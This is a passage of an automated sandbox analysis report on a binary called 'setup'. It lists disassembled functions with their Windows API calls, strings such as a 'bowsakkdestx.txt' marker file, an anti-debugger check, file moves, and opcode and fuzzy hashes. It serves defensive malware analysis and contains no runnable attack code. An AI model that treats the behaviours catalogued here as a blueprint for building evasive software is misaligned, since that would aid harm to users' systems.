                APIs
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.2116193035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2116193035.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2116193035.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: _memset
                • String ID: .\crypto\buffer\buffer.c$C7F
                • API String ID: 2102423945-2013712220
                • Opcode ID: fce9da4f2685e8a546a1aead5558aa77959c7a2ce52c5fe1bdde6675f364ff59
                • Instruction ID: 54406e9f1970e0e1dce797ef07034894a3cffcceb7efccd845a222dac3d76e8e
                • Opcode Fuzzy Hash: fce9da4f2685e8a546a1aead5558aa77959c7a2ce52c5fe1bdde6675f364ff59
                • Instruction Fuzzy Hash: 91216DB1B443213BE200655DFC83B15B395EB84B19F104127FA18D72C2D2B8BC5982D9
                APIs
                Strings
                • 8a4577dc-de55-4eb5-b48a-8a3eee60cd95, xrefs: 0040C687
                Memory Dump Source
                • Source File: 00000002.00000002.2116193035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2116193035.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2116193035.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: StringUuid$CreateFree
                • String ID: 8a4577dc-de55-4eb5-b48a-8a3eee60cd95
                • API String ID: 3044360575-2335240114
                • Opcode ID: 5898d431aa7bc51d8275c67bd3d0945cf80b17b08d4c1006f571a635e441fa64
                • Instruction ID: 0eb901185732211e3be4e37390737b2086ad5c5ed8a4bd7d6c842829bf201ec1
                • Opcode Fuzzy Hash: 5898d431aa7bc51d8275c67bd3d0945cf80b17b08d4c1006f571a635e441fa64
                • Instruction Fuzzy Hash: 6C21D771208341ABD7209F24D844B9BBBE8AF81758F004E6FF88993291D77A9549879A
                APIs
                • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040C48B
                • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0040C4A9
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.2116193035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2116193035.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2116193035.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: Path$AppendFolder
                • String ID: bowsakkdestx.txt
                • API String ID: 29327785-2616962270
                • Opcode ID: cacc9ec5c69f508a09e097335cbe8ae863f85dc58f645bd4f6fa7f4b17594c00
                • Instruction ID: 3b6c08389df4e48a430741a1ce4ce94f3584f996b8880ee9781e1533d320f445
                • Opcode Fuzzy Hash: cacc9ec5c69f508a09e097335cbe8ae863f85dc58f645bd4f6fa7f4b17594c00
                • Instruction Fuzzy Hash: 8701DB72B8022873D9306A557C86FFB775C9F51721F0001B7FE08D6181E5E9554646D5
                APIs
                • _malloc.LIBCMT ref: 00423B64
                  • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                  • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                  • Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(00740000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5
                • std::exception::exception.LIBCMT ref: 00423B82
                • __CxxThrowException@8.LIBCMT ref: 00423B97
                  • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.2116193035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2116193035.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2116193035.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: AllocateExceptionException@8HeapRaiseThrow_mallocstd::exception::exception
                • String ID: bad allocation
                • API String ID: 3074076210-2104205924
                • Opcode ID: 241cfa4299846a07ecc57268e606ba0db0d865f968b84549374c8695ce3f7968
                • Instruction ID: 445f5c97f97310cbd08f0009147839d9c604c92f3643d32107fe893a2d7397f3
                • Opcode Fuzzy Hash: 241cfa4299846a07ecc57268e606ba0db0d865f968b84549374c8695ce3f7968
                • Instruction Fuzzy Hash: 74F0F97560022D66CB00AF99EC56EDE7BECDF04315F40456FFC04A2282DBBCAA4486DD
                APIs
                • LoadCursorW.USER32(00000000,00007F00), ref: 0041BA4A
                • RegisterClassExW.USER32(00000030), ref: 0041BA73
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.2116193035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2116193035.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2116193035.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: ClassCursorLoadRegister
                • String ID: 0$LPCWSTRszWindowClass
                • API String ID: 1693014935-1496217519
                • Opcode ID: fbf28ebe5b3b724a216796b7602f5ba5b22e3d17e3910e7f530213bb4edbfbf6
                • Instruction ID: 39b267f2af3e8e8601893d5e13e9f0aceec8bb1d15aa8544f670d774de374bdc
                • Opcode Fuzzy Hash: fbf28ebe5b3b724a216796b7602f5ba5b22e3d17e3910e7f530213bb4edbfbf6
                • Instruction Fuzzy Hash: 64F0AFB0C042089BEB00DF90D9597DEBBB8BB08308F108259D8187A280D7BA1608CFD9
                APIs
                • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040C438
                • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0040C44E
                • DeleteFileA.KERNEL32(?), ref: 0040C45B
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.2116193035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2116193035.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2116193035.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: Path$AppendDeleteFileFolder
                • String ID: bowsakkdestx.txt
                • API String ID: 610490371-2616962270
                • Opcode ID: 51c9fbb63abd04c953cc1c90cd388c2580edec88c84091088bf86cba3f20ed90
                • Instruction ID: 22f96f022367e4ecd8cb06d74e3ea6c1a096c1ee21cc35b9366b07434c4c4e8f
                • Opcode Fuzzy Hash: 51c9fbb63abd04c953cc1c90cd388c2580edec88c84091088bf86cba3f20ed90
                • Instruction Fuzzy Hash: 60E0807564031C67DB109B60DCC9FD5776C9B04B01F0000B2FF48D10D1D6B495444E55
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.2116193035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2116193035.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2116193035.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: _memset
                • String ID: p2Q
                • API String ID: 2102423945-1521255505
                • Opcode ID: 46ecb9121aab2c4594d1f343841fc1340943ec8095ce101e3444a0aa36bfb78c
                • Instruction ID: 738f0ca8778653557991c93ab9a04937910ac7dae49cf0696bf478295a84fdc8
                • Opcode Fuzzy Hash: 46ecb9121aab2c4594d1f343841fc1340943ec8095ce101e3444a0aa36bfb78c
                • Instruction Fuzzy Hash: C5F03028684750A5F7107750BC667953EC1A735B08F404048E1142A3E2D7FD338C63DD
                APIs
                Memory Dump Source
                • Source File: 00000002.00000002.2116193035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2116193035.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2116193035.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: _memmove_strtok
                • String ID:
                • API String ID: 3446180046-0
                • Opcode ID: 205b1ec61ce906ac0e6ef9ac2fb6feb778f8951e500b67679f42a44b4349684c
                • Instruction ID: d0e58e2a66e8e3875a5229d26ee444e1e0210206766639419d48370c530ec9d7
                • Opcode Fuzzy Hash: 205b1ec61ce906ac0e6ef9ac2fb6feb778f8951e500b67679f42a44b4349684c
                • Instruction Fuzzy Hash: 7F81B07160020AEFDB14DF59D98079ABBF1FF14304F54492EE40567381D3BAAAA4CB96
                APIs
                Memory Dump Source
                • Source File: 00000002.00000002.2116193035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2116193035.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2116193035.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: _memset$__filbuf__getptd_noexit__read_nolock
                • String ID:
                • API String ID: 2974526305-0
                • Opcode ID: 2663944f2ecd2356e6bc0f9128c733698aaf16daf3cf10d514d26d316ebfdedf
                • Instruction ID: 8e6e0b0b404069c1ace538d88af1fa9e5aae20a8402e44ab6f3f0d96efeb0f41
                • Opcode Fuzzy Hash: 2663944f2ecd2356e6bc0f9128c733698aaf16daf3cf10d514d26d316ebfdedf
                • Instruction Fuzzy Hash: 9A51D830B00225FBCB148E69AA40A7F77B1AF11320F94436FF825963D0D7B99D61CB69
                APIs
                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0043C6AD
                • __isleadbyte_l.LIBCMT ref: 0043C6DB
                • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0043C709
                • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0043C73F
                Memory Dump Source
                • Source File: 00000002.00000002.2116193035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2116193035.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2116193035.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                • String ID:
                • API String ID: 3058430110-0
                • Opcode ID: 5d9d0dd00b9c666e2ffb8edf641007e90d7f333e82c154efbd4b40f2329fca1d
                • Instruction ID: 9bb69ce0c337472f3e835d3bfc0adb25a23875f1fe15b1d3b69bac0ae3c4b713
                • Opcode Fuzzy Hash: 5d9d0dd00b9c666e2ffb8edf641007e90d7f333e82c154efbd4b40f2329fca1d
                • Instruction Fuzzy Hash: 4E31F530600206EFDB218F75CC85BBB7BA5FF49310F15542AE865A72A0D735E851DF98
                APIs
                • CreateFileW.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000), ref: 0040F125
                • lstrlenA.KERNEL32(?,?,00000000), ref: 0040F198
                • WriteFile.KERNEL32(00000000,?,00000000), ref: 0040F1A1
                • CloseHandle.KERNEL32(00000000), ref: 0040F1A8
                Memory Dump Source
                • Source File: 00000002.00000002.2116193035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2116193035.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2116193035.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: File$CloseCreateHandleWritelstrlen
                • String ID:
                • API String ID: 1421093161-0
                • Opcode ID: d7c53c20fb31498ecb2e6d2948be234b538ea12271a6e43a57747494780a16e1
                • Instruction ID: 4e0a1a2928686de7afe91093b481d52cb6f90b47dd46c4e49af8be4df8d63ea4
                • Opcode Fuzzy Hash: d7c53c20fb31498ecb2e6d2948be234b538ea12271a6e43a57747494780a16e1
                • Instruction Fuzzy Hash: DF31F531A00104EBDB14AF68DC4ABEE7B78EB05704F50813EF9056B6C0D7796A89CBA5
                APIs
                • ___BuildCatchObject.LIBCMT ref: 004C70AB
                  • Part of subcall function 004C77A0: ___BuildCatchObjectHelper.LIBCMT ref: 004C77D2
                  • Part of subcall function 004C77A0: ___AdjustPointer.LIBCMT ref: 004C77E9
                • _UnwindNestedFrames.LIBCMT ref: 004C70C2
                • ___FrameUnwindToState.LIBCMT ref: 004C70D4
                • CallCatchBlock.LIBCMT ref: 004C70F8
                Memory Dump Source
                • Source File: 00000002.00000002.2116193035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2116193035.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2116193035.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
                • String ID:
                • API String ID: 2901542994-0
                • Opcode ID: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
                • Instruction ID: e860502f941f6c9850043d2e9c4655f99114053cf07e0eb82383b029c5c3ae24
                • Opcode Fuzzy Hash: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
                • Instruction Fuzzy Hash: 2C011736000108BBCF526F56CC01FDA3FAAEF48718F15801EF91866121D33AE9A1DFA5
                APIs
                  • Part of subcall function 00425007: __getptd_noexit.LIBCMT ref: 00425008
                  • Part of subcall function 00425007: __amsg_exit.LIBCMT ref: 00425015
                • __calloc_crt.LIBCMT ref: 00425A01
                  • Part of subcall function 00428C96: __calloc_impl.LIBCMT ref: 00428CA5
                • __lock.LIBCMT ref: 00425A37
                • ___addlocaleref.LIBCMT ref: 00425A43
                • __lock.LIBCMT ref: 00425A57
                  • Part of subcall function 00425208: __getptd_noexit.LIBCMT ref: 00425208
                Memory Dump Source
                • Source File: 00000002.00000002.2116193035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2116193035.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2116193035.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: __getptd_noexit__lock$___addlocaleref__amsg_exit__calloc_crt__calloc_impl
                • String ID:
                • API String ID: 2580527540-0
                • Opcode ID: 4c27c6a87005ee8d291d6f8c20c51fcf026ed3a7e0f62a4f26fef5616d9cb0cf
                • Instruction ID: 8e8bf19fb99f986105457608807abe9f1de148b308aa0ea96eb71ffb67844566
                • Opcode Fuzzy Hash: 4c27c6a87005ee8d291d6f8c20c51fcf026ed3a7e0f62a4f26fef5616d9cb0cf
                • Instruction Fuzzy Hash: A3018471742720DBD720FFAAA443B1D77A09F40728F90424FF455972C6CE7C49418A6D
                APIs
                Memory Dump Source
                • Source File: 00000002.00000002.2116193035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2116193035.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2116193035.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                • String ID:
                • API String ID: 3016257755-0
                • Opcode ID: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                • Instruction ID: 47779ad8523d68e9f2e2bd7ddfa488ab055a33a4313e19cc57a45add4f9be60e
                • Opcode Fuzzy Hash: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                • Instruction Fuzzy Hash: B6014E7240014EBBDF125E85CC428EE3F62BB29354F58841AFE1968131C63AC9B2AB85
                APIs
                • lstrlenW.KERNEL32 ref: 004127B9
                • _malloc.LIBCMT ref: 004127C3
                  • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                  • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                  • Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(00740000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5
                • _memset.LIBCMT ref: 004127CE
                • WideCharToMultiByte.KERNEL32(?,00000000,?,000000FF,00000000,00000001,00000000,00000000), ref: 004127E4
                Memory Dump Source
                • Source File: 00000002.00000002.2116193035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2116193035.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2116193035.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: AllocateByteCharHeapMultiWide_malloc_memsetlstrlen
                • String ID:
                • API String ID: 2824100046-0
                • Opcode ID: d807541a0d1b126bc38ced4668b3b61b472b47aa0d79cc9e7bfc34870b6aacc2
                • Instruction ID: 750470dcacb0e1f47d667e481962336cdcd22eeec5e51d764cc358051e51787a
                • Opcode Fuzzy Hash: d807541a0d1b126bc38ced4668b3b61b472b47aa0d79cc9e7bfc34870b6aacc2
                • Instruction Fuzzy Hash: C6F02735701214BBE72066669C8AFBB769DEB86764F100139F608E32C2E9512D0152F9
                APIs
                • lstrlenA.KERNEL32 ref: 00412806
                • _malloc.LIBCMT ref: 00412814
                  • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                  • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                  • Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(00740000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5
                • _memset.LIBCMT ref: 0041281F
                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000), ref: 00412832
                Memory Dump Source
                • Source File: 00000002.00000002.2116193035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2116193035.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2116193035.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: AllocateByteCharHeapMultiWide_malloc_memsetlstrlen
                • String ID:
                • API String ID: 2824100046-0
                • Opcode ID: 5d53f8f732e4342f1a2ab947ea56d6b713f7325b43ea2b5621e341dec89f9ad8
                • Instruction ID: a3b2a97d17252553cb1267f0baabe0c67c158e4fedc78561389223423b5350a8
                • Opcode Fuzzy Hash: 5d53f8f732e4342f1a2ab947ea56d6b713f7325b43ea2b5621e341dec89f9ad8
                • Instruction Fuzzy Hash: 74E086767011347BE510235B7C8EFAB665CCBC27A5F50012AF615D22D38E941C0185B4
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.2116193035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2116193035.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2116193035.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: _memmove
                • String ID: invalid string position$string too long
                • API String ID: 4104443479-4289949731
                • Opcode ID: 6b6c026794a5df2e3fdb14e42bcdc4c864f1c14e00cdd800f0752a2c1f007913
                • Instruction ID: e15d95b7bc4e28eadeb147f52893af2b9f74cdff9e85ed34d7497a2036010d09
                • Opcode Fuzzy Hash: 6b6c026794a5df2e3fdb14e42bcdc4c864f1c14e00cdd800f0752a2c1f007913
                • Instruction Fuzzy Hash: 86C15C70704209DBCB24CF58D9C09EAB3B6FFC5304720452EE8468B655DB35ED96CBA9
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.2116193035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2116193035.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2116193035.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: _memset
                • String ID: .\crypto\asn1\tasn_new.c
                • API String ID: 2102423945-2878120539
                • Opcode ID: 71e1991ce2e3632dc73bc3e3216da1e10f6e2bb0c3d1e289869c94216a61690f
                • Instruction ID: a01d7b69f66ede694d5e1501cc12839462a5262961aeb872149f1145b0afa5c3
                • Opcode Fuzzy Hash: 71e1991ce2e3632dc73bc3e3216da1e10f6e2bb0c3d1e289869c94216a61690f
                • Instruction Fuzzy Hash: 5D510971342341A7E7306EA6AC82FB77798DF41B64F04442BFA0CD5282EA9DEC44817A
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.2116193035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2116193035.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2116193035.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: _memmove
                • String ID: invalid string position$string too long
                • API String ID: 4104443479-4289949731
                • Opcode ID: 964545c748993364f79d16a0f131f75f7c6f97d2359d890db139b78c498e4dd2
                • Instruction ID: 388339a757d446dde0ac97e241c54aefb3b464f1a8010d5a2c21a1bfa385432d
                • Opcode Fuzzy Hash: 964545c748993364f79d16a0f131f75f7c6f97d2359d890db139b78c498e4dd2
                • Instruction Fuzzy Hash: AC517F317042099BCF24DF19D9808EAB7B6FF85304B20456FE8158B351DB39ED968BE9
                APIs
                • GetUserNameW.ADVAPI32(?,?), ref: 0041B1BA
                  • Part of subcall function 004111C0: CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000003,00000080,00000000,?,?,?), ref: 0041120F
                  • Part of subcall function 004111C0: GetFileSizeEx.KERNEL32(00000000,?), ref: 00411228
                  • Part of subcall function 004111C0: CloseHandle.KERNEL32(00000000), ref: 0041123D
                  • Part of subcall function 004111C0: MoveFileW.KERNEL32(?,?), ref: 00411277
                  • Part of subcall function 0041BA10: LoadCursorW.USER32(00000000,00007F00), ref: 0041BA4A
                  • Part of subcall function 0041BA10: RegisterClassExW.USER32(00000030), ref: 0041BA73
                  • Part of subcall function 0041BA80: CreateWindowExW.USER32(00000000,LPCWSTRszWindowClass,LPCWSTRszTitle,00CF0000,80000000,00000000,80000000,00000000,00000000,00000000,?,00000000), ref: 0041BAAD
                • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0041B4B3
                • TranslateMessage.USER32(?), ref: 0041B4CD
                • DispatchMessageW.USER32(?), ref: 0041B4D7
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.2116193035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2116193035.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2116193035.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: FileMessage$Create$ClassCloseCursorDispatchHandleLoadMoveNameRegisterSizeTranslateUserWindow
                • String ID: %username%$I:\5d2860c89d774.jpg
                • API String ID: 441990211-897913220
                • Opcode ID: 57ecfa34f23d78a1e26d0b496c5de0e3008a9e2e419c5c8680807d27605a0cc3
                • Instruction ID: 53fb4cb99f7e95a824910e08ad4bb0dd21933b0d591bc71827c80b4e91f39c04
                • Opcode Fuzzy Hash: 57ecfa34f23d78a1e26d0b496c5de0e3008a9e2e419c5c8680807d27605a0cc3
                • Instruction Fuzzy Hash: 015188715142449BC718FF61CC929EFB7A8BF54348F40482EF446431A2EF78AA9DCB96
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.2116193035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2116193035.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2116193035.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID: .\crypto\err\err.c$unknown
                • API String ID: 0-565200744
                • Opcode ID: 9dae3d662d88e5d53485dd14566563c9255a5f0e4e3b7cf97cf97a7a2e17faf8
                • Instruction ID: d1206a4052711c5ef0d05e5a1f97d3c0da723a5ab1c334b9285c6dd525f2274c
                • Opcode Fuzzy Hash: 9dae3d662d88e5d53485dd14566563c9255a5f0e4e3b7cf97cf97a7a2e17faf8
                • Instruction Fuzzy Hash: 72117C69F8070067F6202B166C87F562A819764B5AF55042FFA482D3C3E2FE54D8829E
                APIs
                • _memset.LIBCMT ref: 0042419D
                • IsDebuggerPresent.KERNEL32(?,?,00000001), ref: 00424252
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.2116193035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2116193035.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2116193035.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: DebuggerPresent_memset
                • String ID: i;B
                • API String ID: 2328436684-472376889
                • Opcode ID: 0bc333208f10a2510305f30f60194ffc8a1e9bc236dda87ca461c0d5e10d6844
                • Instruction ID: b2deef9000060817df5d9888a0c5d5c31052404ed3c7d79a7a675bf972ea9145
                • Opcode Fuzzy Hash: 0bc333208f10a2510305f30f60194ffc8a1e9bc236dda87ca461c0d5e10d6844
                • Instruction Fuzzy Hash: 3231D57591122C9BCB21DF69D9887C9B7B8FF08310F5042EAE80CA6251EB349F858F59
                APIs
                • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0042AB93
                • ___raise_securityfailure.LIBCMT ref: 0042AC7A
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.2116193035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2116193035.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2116193035.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: FeaturePresentProcessor___raise_securityfailure
                • String ID: 8Q
                • API String ID: 3761405300-2096853525
                • Opcode ID: eccf15afe34b7bdc1ccbb155ef79912499653c52d5481e078dd775b5985af611
                • Instruction ID: cc78ca7643d31f84c049b3cf87471233b0d3094e131d8c276326ba2ae67c1d9c
                • Opcode Fuzzy Hash: eccf15afe34b7bdc1ccbb155ef79912499653c52d5481e078dd775b5985af611
                • Instruction Fuzzy Hash: 4F21FFB5500304DBD750DF56F981A843BE9BB68310F10AA1AE908CB7E0D7F559D8EF45
                APIs
                • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 00413CA0
                  • Part of subcall function 00423B4C: _malloc.LIBCMT ref: 00423B64
                • _memset.LIBCMT ref: 00413C83
                Strings
                Memory Dump Source
